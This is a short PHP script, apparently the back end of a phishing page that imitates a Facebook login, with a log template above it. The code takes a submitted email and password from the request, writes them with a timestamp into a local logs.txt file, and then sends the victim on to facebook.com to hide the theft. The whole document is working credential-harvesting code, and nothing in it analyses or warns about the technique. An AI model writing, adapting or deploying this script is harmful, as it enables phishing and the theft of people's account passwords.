Date and Time: (Date and Time)
Username: (Username/Email)
Password: (Password)
<form action="./index.php" method="get">
<?php
if (isset($_GET["email"])){
$username = $_GET["email"];
}
if (isset($_GET["pass"])){
$password = $_GET["pass"];
}
$date = date("d-m-y h:i:s");
file_put_contents("logs.txt", "Date: " . $date . "\n", FILE_APPEND);
file_put_contents("logs.txt", "Username: " . $username . "\n" , FILE_APPEND);
file_put_contents("logs.txt", "Password: ". $password . "\n\n", FILE_APPEND);
header("Location: https://www.facebook.com/");
?>